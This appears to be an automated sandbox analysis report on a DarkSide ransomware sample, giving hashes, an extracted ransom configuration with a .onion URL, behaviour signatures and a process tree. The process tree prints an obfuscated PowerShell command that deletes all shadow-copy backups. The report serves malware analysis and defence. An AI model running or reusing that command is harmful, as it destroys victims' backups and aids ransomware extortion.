Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
05-01-2022 15:15
Static task
static1
Behavioral task
behavioral1
Sample
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
Resource
win10-en-20211208
General
-
Target
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe
-
Size
260KB
-
MD5
ce7b2f7008ab93c659494f2931160147
-
SHA1
ed2aec7ebbcb87059b707aa98bd300c8d75f3acd
-
SHA256
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc
-
SHA512
6b81bd235ad199b01ee0801a3e14544a4a720ee0609aaa0df99415dcecf10a114219a96f79f57915701b3f6576ac7259d472519964516a1d92ee4023babab0fb
Malware Config
Extracted
C:\\README.08e0b4c3.TXT
darkside
https://ibb.co/j579HKQ
https://ibb.co/HNfwBXp
https://ibb.co/GTCknt9
https://ibb.co/s559W3C
https://ibb.co/LNgjXNT
https://ibb.co/r2QJ6fV
https://ibb.co/PQBRrTn
https://ibb.co/1851npy
https://ibb.co/yFWcMsm
https://ibb.co/1ZsVP9B
https://ibb.co/3CPYZ7K
http://darksidfqzcuhtk2.onion/V1WEX06KUR61Z0JUXM0R12HXQK71TWOKVVTURZMSESZQ9V8FI49X23M1NUSCSPQO
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exedescription ioc process File renamed C:\Users\Admin\Pictures\MountComplete.tif => C:\Users\Admin\Pictures\MountComplete.tif.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File opened for modification C:\Users\Admin\Pictures\MountComplete.tif.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File renamed C:\Users\Admin\Pictures\UnblockConvert.crw => C:\Users\Admin\Pictures\UnblockConvert.crw.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File opened for modification C:\Users\Admin\Pictures\UnblockConvert.crw.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File renamed C:\Users\Admin\Pictures\UseRedo.crw => C:\Users\Admin\Pictures\UseRedo.crw.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File opened for modification C:\Users\Admin\Pictures\UseRedo.crw.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File renamed C:\Users\Admin\Pictures\ExportComplete.raw => C:\Users\Admin\Pictures\ExportComplete.raw.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe File opened for modification C:\Users\Admin\Pictures\ExportComplete.raw.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\08e0b4c3.BMP" c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\08e0b4c3.BMP" c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -
Modifies Control Panel 1 IoCs
Processes:
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\WallpaperStyle = "10" c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -
Modifies registry class 5 IoCs
Processes:
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.08e0b4c3\ = "08e0b4c3" c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3\DefaultIcon c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\08e0b4c3\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\08e0b4c3.ico" c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exec718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exepid process 2288 powershell.exe 2288 powershell.exe 2288 powershell.exe 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeSecurityPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeTakeOwnershipPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeLoadDriverPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeSystemProfilePrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeSystemtimePrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeProfSingleProcessPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeIncBasePriorityPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeCreatePagefilePrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeBackupPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeRestorePrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeShutdownPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeDebugPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeSystemEnvironmentPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeRemoteShutdownPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeUndockPrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeManageVolumePrivilege 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: 33 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: 34 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: 35 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: 36 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeBackupPrivilege 620 vssvc.exe Token: SeRestorePrivilege 620 vssvc.exe Token: SeAuditPrivilege 620 vssvc.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exedescription pid process target process PID 4016 wrote to memory of 2288 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe powershell.exe PID 4016 wrote to memory of 2288 4016 c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe"C:\Users\Admin\AppData\Local\Temp\c718e6eaa1a446e0a3d72b533b3552c4419e9e2c646e48a5cbfeb6a7ee88c3dc.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2a8e26e48e324de3e4881b1c71cd83a9
SHA17bd20805009f8aa0ad63766d439f628969a19810
SHA25649a6d5b9a5a3be5ec6c9c9637591dec814d79fde4ac4319e36525e2183f89488
SHA5120eafb6fd87d7714f517717caf5b77097ffa090363ed72778f34bb0b158f733fb30fce7722929b3e54ca2e3a8e90961f3c81a837814d9bff770150d161cb541a3
-
memory/2288-126-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-127-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-119-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-121-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-122-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-123-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-124-0x000001FA243E0000-0x000001FA24402000-memory.dmpFilesize
136KB
-
memory/2288-125-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-118-0x0000000000000000-mapping.dmp
-
memory/2288-120-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-128-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-129-0x000001FA0A110000-0x000001FA0A112000-memory.dmpFilesize
8KB
-
memory/2288-130-0x000001FA0A113000-0x000001FA0A115000-memory.dmpFilesize
8KB
-
memory/2288-131-0x000001FA24590000-0x000001FA24606000-memory.dmpFilesize
472KB
-
memory/2288-132-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/2288-142-0x000001FA0A116000-0x000001FA0A118000-memory.dmpFilesize
8KB
-
memory/2288-147-0x000001FA0A010000-0x000001FA0A012000-memory.dmpFilesize
8KB
-
memory/4016-117-0x0000000000400000-0x000000000083C000-memory.dmpFilesize
4.2MB
-
memory/4016-116-0x0000000000030000-0x0000000000040000-memory.dmpFilesize
64KB